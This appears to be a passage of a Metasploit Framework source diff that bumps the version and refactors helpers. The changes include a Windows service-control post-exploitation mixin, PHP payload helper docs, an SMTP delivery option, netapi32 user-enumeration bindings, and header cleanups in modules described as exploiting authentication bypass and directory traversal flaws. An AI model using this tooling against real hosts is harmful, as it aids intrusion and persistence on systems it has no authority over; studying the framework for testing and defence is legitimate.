def postgres_create_stager_table
|
||||
tbl = Rex::Text.rand_text_alpha(8).downcase
|
||||
fld = Rex::Text.rand_text_alpha(8).downcase
|
||||
|
|
|
@ -31,6 +31,7 @@ module Exploit::Remote::SMTPDeliver
|
|||
OptString.new('SUBJECT', [ true, 'Subject line of the email' ]),
|
||||
OptString.new('USERNAME', [ false, 'SMTP Username for sending email', '' ]),
|
||||
OptString.new('PASSWORD', [ false, 'SMTP Password for sending email', '' ]),
|
||||
OptString.new('DOMAIN', [false, 'SMTP Domain to EHLO to', '']),
|
||||
OptString.new('VERBOSE', [ false, 'Display verbose information' ]),
|
||||
], Msf::Exploit::Remote::SMTPDeliver)
|
||||
register_autofilter_ports([ 25, 465, 587, 2525, 25025, 25000])
|
||||
|
@ -72,7 +73,11 @@ module Exploit::Remote::SMTPDeliver
|
|||
print_verbose("Connecting to SMTP server #{rhost}:#{rport}...")
|
||||
nsock = connect(global)
|
||||
|
||||
domain = Rex::Text.rand_text_alpha(rand(32)+1)
|
||||
if datastore['DOMAIN'] and not datastore['DOMAIN'] == ''
|
||||
domain = datastore['DOMAIN']
|
||||
else
|
||||
domain = Rex::Text.rand_text_alpha(rand(32)+1)
|
||||
end
|
||||
|
||||
res = raw_send_recv("EHLO #{domain}\r\n", nsock)
|
||||
if res =~ /STARTTLS/
|
||||
|
|
|
@ -17,9 +17,9 @@ class Framework
|
|||
#
|
||||
|
||||
Major = 4
|
||||
Minor = 5
|
||||
Minor = 6
|
||||
Point = 0
|
||||
Release = "-release"
|
||||
Release = "-dev"
|
||||
|
||||
if(Point)
|
||||
Version = "#{Major}.#{Minor}.#{Point}#{Release}"
|
||||
|
|
|
@ -0,0 +1,58 @@
|
|||
|
||||
module Msf::Module::Deprecated
|
||||
|
||||
# Additional class methods for deprecated modules
|
||||
module ClassMethods
|
||||
# Mark this module as deprecated
|
||||
#
|
||||
# Any time this module is run it will print warnings to that effect.
|
||||
#
|
||||
# @param deprecation_date [Date,#to_s] The date on which this module will
|
||||
# be removed
|
||||
# @param replacement_module [String] The name of a module that users
|
||||
# should be using instead of this deprecated one
|
||||
# @return [void]
|
||||
def deprecated(deprecation_date=nil, replacement_module=nil)
|
||||
# Yes, class instance variables.
|
||||
@replacement_module = replacement_module
|
||||
@deprecation_date = deprecation_date
|
||||
end
|
||||
|
||||
# The name of a module that users should be using instead of this
|
||||
# deprecated one
|
||||
#
|
||||
# @return [String,nil]
|
||||
# @see ClassMethods#deprecated
|
||||
def replacement_module; @replacement_module; end
|
||||
|
||||
# The date on which this module will be removed
|
||||
#
|
||||
# @return [Date,nil]
|
||||
# @see ClassMethods#deprecated
|
||||
def deprecation_date; @deprecation_date; end
|
||||
end
|
||||
|
||||
# (see ClassMethods#replacement_module)
|
||||
def replacement_module; self.class.replacement_module; end
|
||||
# (see ClassMethods#deprecation_date)
|
||||
def deprecation_date; self.class.deprecation_date; end
|
||||
|
||||
# Extends with {ClassMethods}
|
||||
def self.included(base)
|
||||
base.extend(ClassMethods)
|
||||
end
|
||||
|
||||
def setup
|
||||
print_warning("*"*72)
|
||||
print_warning("*%red"+"This module is deprecated!".center(70)+"%clr*")
|
||||
if deprecation_date
|
||||
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
|
||||
end
|
||||
if replacement_module
|
||||
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
|
||||
end
|
||||
print_warning("*"*72)
|
||||
super
|
||||
end
|
||||
|
||||
end
|
|
@ -12,10 +12,10 @@ module Msf::Payload::Php
|
|||
#
|
||||
# The generated code will initialize
|
||||
#
|
||||
# @options options [String] :disabled_varname PHP variable name in which to
|
||||
# @option options [String] :disabled_varname PHP variable name in which to
|
||||
# store an array of disabled functions.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code
|
||||
# @return [String] A chunk of PHP code
|
||||
#
|
||||
def php_preamble(options = {})
|
||||
dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
|
||||
|
@ -42,15 +42,15 @@ module Msf::Payload::Php
|
|||
#
|
||||
# Generate a chunk of PHP code that tries to run a command.
|
||||
#
|
||||
# @options options [String] :cmd_varname PHP variable name containing the
|
||||
# @option options [String] :cmd_varname PHP variable name containing the
|
||||
# command to run
|
||||
# @options options [String] :disabled_varname PHP variable name containing
|
||||
# @option options [String] :disabled_varname PHP variable name containing
|
||||
# an array of disabled functions. See #php_preamble
|
||||
# @options options [String] :output_varname PHP variable name in which to
|
||||
# @option options [String] :output_varname PHP variable name in which to
|
||||
# store the output of the command. Will contain 0 if no exec functions
|
||||
# work.
|
||||
#
|
||||
# @returns [String] A chunk of PHP code that, with a little luck, will run a
|
||||
# @return [String] A chunk of PHP code that, with a little luck, will run a
|
||||
# command.
|
||||
#
|
||||
def php_system_block(options = {})
|
||||
|
|
|
@ -5,34 +5,108 @@ module Msf
|
|||
class Post
|
||||
module Windows
|
||||
|
||||
|
||||
# @deprecated Use {Services} instead
|
||||
module WindowsServices
|
||||
def self.included(base)
|
||||
include Services
|
||||
end
|
||||
|
||||
def setup
|
||||
print_error("The Windows::WindowsServices mixin is deprecated, use Windows::Services instead")
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Post module mixin for dealing with Windows services
|
||||
#
|
||||
module Services
|
||||
|
||||
include ::Msf::Post::Windows::Registry
|
||||
|
||||
#
|
||||
# List all Windows Services present. Returns an Array containing the names
|
||||
# of the services.
|
||||
# Open the service manager with advapi32.dll!OpenSCManagerA on the
|
||||
# given host or the local machine if :host option is nil. If called
|
||||
# with a block, yields the manager and closes it when the block
|
||||
# returns.
|
||||
#
|
||||
# @param opts [Hash]
|
||||
# @option opts [String] :host (nil) The host on which to open the
|
||||
# service manager. May be a hostname or IP address.
|
||||
# @option opts [Fixnum] :access (0xF003F) Bitwise-or of the
|
||||
# SC_MANAGER_* constants (see
|
||||
# {http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx})
|
||||
#
|
||||
# @return [Fixnum] Opaque Windows handle SC_HANDLE as returned by
|
||||
# OpenSCManagerA()
|
||||
# @yield [manager] Gives the block a manager handle as returned by
|
||||
# advapi32.dll!OpenSCManagerA. When the block returns, the handle
|
||||
# will be closed with {#close_sc_manager}.
|
||||
# @raise [RuntimeError] if OpenSCManagerA returns a NULL handle
|
||||
#
|
||||
def open_sc_manager(opts={})
|
||||
host = opts[:host] || nil
|
||||
access = opts[:access] || 0xF003F
|
||||
machine_str = host ? "\\\\#{host}" : nil
|
||||
|
||||
# SC_HANDLE WINAPI OpenSCManager(
|
||||
# _In_opt_ LPCTSTR lpMachineName,
|
||||
# _In_opt_ LPCTSTR lpDatabaseName,
|
||||
# _In_ DWORD dwDesiredAccess
|
||||
# );
|
||||
manag = session.railgun.advapi32.OpenSCManagerA(machine_str,nil,access)
|
||||
if (manag["return"] == 0)
|
||||
raise RuntimeError.new("Unable to open service manager, GetLastError: #{manag["GetLastError"]}")
|
||||
end
|
||||
|
||||
if (block_given?)
|
||||
begin
|
||||
yield manag["return"]
|
||||
ensure
|
||||
close_sc_manager(manag["return"])
|
||||
end
|
||||
else
|
||||
return manag["return"]
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Call advapi32.dll!CloseServiceHandle on the given handle
|
||||
#
|
||||
def close_sc_manager(handle)
|
||||
if handle
|
||||
session.railgun.advapi32.CloseServiceHandle(handle)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# List all Windows Services present
|
||||
#
|
||||
# @return [Array] The names of the services.
|
||||
#
|
||||
# @todo Rewrite to allow operating on a remote host
|
||||
#
|
||||
def service_list
|
||||
serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
|
||||
threadnum = 0
|
||||
a =[]
|
||||
services = []
|
||||
registry_enumkeys(serviceskey).each do |s|
|
||||
if threadnum < 10
|
||||
a.push(::Thread.new(s) { |sk|
|
||||
begin
|
||||
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
|
||||
if srvtype =~ /32|16/
|
||||
services << sk
|
||||
end
|
||||
rescue
|
||||
end
|
||||
})
|
||||
threadnum += 1
|
||||
else
|
||||
sleep(0.05) and a.delete_if {|x| not x.alive?} while not a.empty?
|
||||
threadnum = 0
|
||||
keys = registry_enumkeys(serviceskey)
|
||||
keys.each do |s|
|
||||
if a.length >= 10
|
||||
a.first.join
|
||||
a.delete_if {|x| not x.alive?}
|
||||
end
|
||||
t = framework.threads.spawn(self.refname+"-ServiceRegistryList",false,s) { |sk|
|
||||
begin
|
||||
srvtype = registry_getvaldata("#{serviceskey}\\#{sk}","Type").to_s
|
||||
if srvtype == "32" or srvtype == "16"
|
||||
services << sk
|
||||
end
|
||||
rescue
|
||||
end
|
||||
}
|
||||
a.push(t)
|
||||
end
|
||||
|
||||
return services
|
||||
|
@ -45,6 +119,13 @@ module WindowsServices
|
|||
# command executed by the service. Service name is case sensitive. Hash
|
||||
# keys are Name, Start, Command and Credentials.
|
||||
#
|
||||
# @param name [String] The target service's name (not to be confused
|
||||
# with Display Name). Case sensitive.
|
||||
#
|
||||
# @return [Hash]
|
||||
#
|
||||
# @todo Rewrite to allow operating on a remote host
|
||||
#
|
||||
def service_info(name)
|
||||
service = {}
|
||||
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
|
||||
|
@ -68,6 +149,8 @@ module WindowsServices
|
|||
# Mode is a string with either auto, manual or disable for the
|
||||
# corresponding setting. The name of the service is case sensitive.
|
||||
#
|
||||
# @todo Rewrite to allow operating on a remote host
|
||||
#
|
||||
def service_change_startup(name,mode)
|
||||
servicekey = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\#{name.chomp}"
|
||||
case mode.downcase
|
||||
|
@ -81,22 +164,30 @@ module WindowsServices
|
|||
end
|
||||
|
||||
#
|
||||
# Create a service that runs it's own process.
|
||||
# Create a service that runs +executable_on_host+ on the session host
|
||||
#
|
||||
# It takes as values the service name as string, the display name as
|
||||
# string, the path of the executable on the host that will execute at
|
||||
# startup as string and the startup type as an integer of 2 for Auto, 3 for
|
||||
# Manual or 4 for Disable, default Auto.
|
||||
# @param name [String] Name of the service to be used as the key
|
||||
# @param display_name [String] Name of the service as displayed by mmc
|
||||
# @param executable_on_host [String] EXE on the remote filesystem to
|
||||
# be used as the service executable
|
||||
# @param startup [Fixnum] Constant used by CreateServiceA for startup
|
||||
# type: 2 for Auto, 3 for Manual, 4 for Disable. Default is Auto
|
||||
# @param server [String,nil] A hostname or IP address. Default is the
|
||||
# remote localhost
|
||||
#
|
||||
# @return [true,false] True if there were no errors, false otherwise
|
||||
#
|
||||
def service_create(name, display_name, executable_on_host, startup=2, server=nil)
|
||||
machine_str = server ? "\\\\#{server}" : nil
|
||||
adv = session.railgun.advapi32
|
||||
manag = adv.OpenSCManagerA(machine_str,nil,0x13)
|
||||
if(manag["return"] != 0)
|
||||
|
||||
# SC_MANAGER_CONNECT 0x01
|
||||
# SC_MANAGER_CREATE_SERVICE 0x02
|
||||
# SC_MANAGER_QUERY_LOCK_STATUS 0x10
|
||||
open_sc_manager(:host=>server, :access=>0x13) do |manager|
|
||||
# SC_HANDLE WINAPI CreateService(
|
||||
# __in SC_HANDLE hSCManager,
|
||||
# __in LPCTSTR lpServiceName,
|
||||
# __in_opt LPCTSTR lpDisplayName,
|
||||
# __in_opt LPCTSTR lpDisplayName,
|
||||
# __in DWORD dwDesiredAccess,
|
||||
# __in DWORD dwServiceType,
|
||||
# __in DWORD dwStartType,
|
||||
|
@ -108,113 +199,112 @@ module WindowsServices
|
|||
# __in_opt LPCTSTR lpServiceStartName,
|
||||
# __in_opt LPCTSTR lpPassword
|
||||
#);
|
||||
# SC_MANAGER_CREATE_SERVICE = 0x0002
|
||||
newservice = adv.CreateServiceA(manag["return"],name,display_name,
|
||||
0x0010,0X00000010,startup,0,executable_on_host,nil,nil,nil,nil,nil)
|
||||
newservice = adv.CreateServiceA(manager, name, display_name,
|
||||
0x0010, 0X00000010, startup, 0, executable_on_host,
|
||||
nil, nil, nil, nil, nil)
|
||||
adv.CloseServiceHandle(newservice["return"])
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
#SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
|
||||
#SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
|
||||
if newservice["GetLastError"] == 0
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
else
|
||||
raise "Could not open Service Control Manager, Access Denied"
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Start a service.
|
||||
#
|
||||
# Returns 0 if service started, 1 if service is already started and 2 if
|
||||
# service is disabled.
|
||||
# @param name [String] Service name (not display name)
|
||||
# @param server [String,nil] A hostname or IP address. Default is the
|
||||
# remote localhost
|
||||
#
|
||||
# @return [Fixnum] 0 if service started successfully, 1 if it failed
|
||||
# because the service is already running, 2 if it is disabled
|
||||
#
|
||||
# @raise [RuntimeError] if OpenServiceA failed
|
||||
#
|
||||
def service_start(name, server=nil)
|
||||
machine_str = server ? "\\\\#{server}" : nil
|
||||
adv = session.railgun.advapi32
|
||||
manag = adv.OpenSCManagerA(machine_str,nil,1)
|
||||
if(manag["return"] == 0)
|
||||
raise "Could not open Service Control Manager, Access Denied"
|
||||
end
|
||||
#open with SERVICE_START (0x0010)
|
||||
servhandleret = adv.OpenServiceA(manag["return"],name,0x10)
|
||||
if(servhandleret["return"] == 0)
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
raise "Could not Open Service, Access Denied"
|
||||
end
|
||||
retval = adv.StartServiceA(servhandleret["return"],0,nil)
|
||||
adv.CloseServiceHandle(servhandleret["return"])
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
if retval["GetLastError"] == 0
|
||||
return 0
|
||||
elsif retval["GetLastError"] == 1056
|
||||
return 1
|
||||
elsif retval["GetLastError"] == 1058
|
||||
return 2
|
||||
open_sc_manager(:host=>server, :access=>1) do |manager|
|
||||
# SC_HANDLE WINAPI OpenService(
|
||||
# _In_ SC_HANDLE hSCManager,
|
||||
# _In_ LPCTSTR lpServiceName,
|
||||
# _In_ DWORD dwDesiredAccess
|
||||
# );
|
||||
# open with access SERVICE_START (0x0010)
|
||||
handle = adv.OpenServiceA(manager, name, 0x10)
|
||||
if(handle["return"] == 0)
|
||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||
end
|
||||
retval = adv.StartServiceA(handle["return"],0,nil)
|
||||
adv.CloseServiceHandle(handle["return"])
|
||||
|
||||
# This is terrible. Magic return values should be refactored to
|
||||
# something meaningful.
|
||||
case retval["GetLastError"]
|
||||
when 0; return 0 # everything worked
|
||||
when 1056; return 1 # service already started
|
||||
when 1058; return 2 # service disabled
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Stop a service.
|
||||
#
|
||||
# Returns 0 if service is stopped successfully, 1 if service is already
|
||||
# stopped or disabled and 2 if the service can not be stopped.
|
||||
# @param (see #service_start)
|
||||
# @return [Fixnum] 0 if service stopped successfully, 1 if it failed
|
||||
# because the service is already stopped or disabled, 2 if it
|
||||
# cannot be stopped for some other reason.
|
||||
#
|
||||
# @raise (see #service_start)
|
||||
#
|
||||
def service_stop(name, server=nil)
|
||||
machine_str = server ? "\\\\#{server}" : nil
|
||||
adv = session.railgun.advapi32
|
||||
manag = adv.OpenSCManagerA(machine_str,nil,1)
|
||||
if(manag["return"] == 0)
|
||||
raise "Could not open Service Control Manager, Access Denied"
|
||||
end
|
||||
#open with SERVICE_STOP (0x0020)
|
||||
servhandleret = adv.OpenServiceA(manag["return"],name,0x30)
|
||||
if(servhandleret["return"] == 0)
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
raise "Could not Open Service, Access Denied"
|
||||
end
|
||||
retval = adv.ControlService(servhandleret["return"],1,56)
|
||||
adv.CloseServiceHandle(servhandleret["return"])
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
if retval["GetLastError"] == 0
|
||||
return 0
|
||||
elsif retval["GetLastError"] == 1062
|
||||
return 1
|
||||
elsif retval["GetLastError"] == 1052
|
||||
return 2
|
||||
|
||||
# SC_MANAGER_SERVICE_STOP (0x0020)
|
||||
open_sc_manager(:host=>server, :access=>1) do |manager|
|
||||
# open with SERVICE_STOP (0x0020)
|
||||
handle = adv.OpenServiceA(manager, name, 0x20)
|
||||
if(handle["return"] == 0)
|
||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||
end
|
||||
retval = adv.ControlService(handle["return"],1,56)
|
||||
adv.CloseServiceHandle(handle["return"])
|
||||
|
||||
case retval["GetLastError"]
|
||||
when 0; return 0 # worked
|
||||
when 1062; return 1 # already stopped or disabled
|
||||
when 1052; return 2 # cannot be stopped
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Delete a service.
|
||||
#
|
||||
# @param (see #service_start)
|
||||
#
|
||||
def service_delete(name, server=nil)
|
||||
machine_str = server ? "\\\\#{server}" : nil
|
||||
adv = session.railgun.advapi32
|
||||
|
||||
# #define SC_MANAGER_ALL_ACCESS 0xF003F
|
||||
manag = adv.OpenSCManagerA(machine_str,nil,0xF003F)
|
||||
if (manag["return"] == 0)
|
||||
raise "Could not open Service Control Manager, Access Denied"
|
||||
open_sc_manager(:host=>server) do |manager|
|
||||
# Now to grab a handle to the service.
|
||||
# Thank you, Wine project for defining the DELETE constant since it,
|
||||
# and all its friends, are missing from the MSDN docs.
|
||||
# #define DELETE 0x00010000
|
||||
handle = adv.OpenServiceA(manager, name, 0x10000)
|
||||
if (handle["return"] == 0)
|
||||
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
|
||||
end
|
||||
|
||||
# Lastly, delete it
|
||||
adv.DeleteService(handle["return"])
|
||||
|
||||
adv.CloseServiceHandle(handle["return"])
|
||||
|
||||
handle["GetLastError"]
|
||||
end
|
||||
|
||||
# Now to grab a handle to the service.
|
||||
# Thank you, Wine project for defining the DELETE constant since it,
|
||||
# and all its friends, are missing from the MSDN docs.
|
||||
# #define DELETE 0x00010000
|
||||
servhandleret = adv.OpenServiceA(manag["return"],name,0x10000)
|
||||
if (servhandleret["return"] == 0)
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
raise "Could not Open Service, Access Denied"
|
||||
end
|
||||
|
||||
# Lastly, delete it
|
||||
adv.DeleteService(servhandleret["return"])
|
||||
|
||||
adv.CloseServiceHandle(manag["return"])
|
||||
adv.CloseServiceHandle(servhandleret["return"])
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ module Windows
|
|||
# http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html
|
||||
module ShadowCopy
|
||||
|
||||
include Msf::Post::Windows::WindowsServices
|
||||
include Msf::Post::Windows::Services
|
||||
|
||||
#
|
||||
# Get the device name for the shadow copy, which is used when accessing
|
||||
|
|
|
@ -6,7 +6,7 @@ module Scripts
|
|||
module Meterpreter
|
||||
module Common
|
||||
|
||||
include ::Msf::Post::Windows::WindowsServices
|
||||
include ::Msf::Post::Windows::Services
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -124,7 +124,7 @@ module PacketFu
|
|||
attr_accessor :eth_header, :ip_header, :icmp_header
|
||||
|
||||
def self.can_parse?(str)
|
||||
return false unless str.size >= 54
|
||||
return false unless str.size >= 38
|
||||
return false unless EthPacket.can_parse? str
|
||||
return false unless IPPacket.can_parse? str
|
||||
return false unless str[23,1] == "\x01"
|
||||
|
|
|
@ -35,6 +35,26 @@ class Def_netapi32
|
|||
["DWORD","resume_handle","inout"]
|
||||
])
|
||||
|
||||
dll.add_function('NetWkstaUserEnum', 'DWORD', [
|
||||
["PWCHAR","servername","in"],
|
||||
["DWORD","level","in"],
|
||||
["PDWORD","bufptr","out"],
|
||||
["DWORD","prefmaxlen","in"],
|
||||
["PDWORD","entriesread","out"],
|
||||
["PDWORD","totalentries","out"],
|
||||
["DWORD","resume_handle","inout"]
|
||||
])
|
||||
|
||||
dll.add_function('NetUserGetGroups', 'DWORD', [
|
||||
["PWCHAR","servername","in"],
|
||||
["PWCHAR","username","in"],
|
||||
["DWORD","level","in"],
|
||||
["PDWORD","bufptr","out"],
|
||||
["DWORD","prefmaxlen","in"],
|
||||
["PDWORD","entriesread","out"],
|
||||
["PDWORD","totalentries","out"]
|
||||
])
|
||||
|
||||
return dll
|
||||
end
|
||||
|
||||
|
@ -42,4 +62,3 @@ end
|
|||
|
||||
end; end; end; end; end; end; end
|
||||
|
||||
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -24,7 +20,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
configuration changes (such as resetting the password) as administrators.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => "$Revision$",
|
||||
'Author' =>
|
||||
[
|
||||
'hkm [at] hakim.ws', #Initial discovery, poc
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm', 'Unknown' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2005-2611'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '17627' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,6 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits an authentication bypass issue which allows arbitrary
|
||||
password change requests to be issued for any user in the local store.
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '19680' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -26,7 +22,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-0795' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -31,8 +27,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['OSVDB', '60035'],
|
||||
],
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options([
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -25,7 +21,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -34,7 +30,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => 'jduck',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '65533'],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'ContentKeeper Web Appliance mimencode File Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module abuses the 'mimencode' binary present within
|
||||
ContentKeeper Web filtering appliances to retrieve arbitrary
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -30,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '5798' ],
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
|
||||
allowing for simple brute force attacks to bypass authentication and gain administrative
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat Administration Tool Default Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Detect the Tomcat administration interface.',
|
||||
'References' =>
|
||||
[
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module tests whether a directory traversal vulnerablity is present
|
||||
in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0
|
||||
|
|
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -19,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
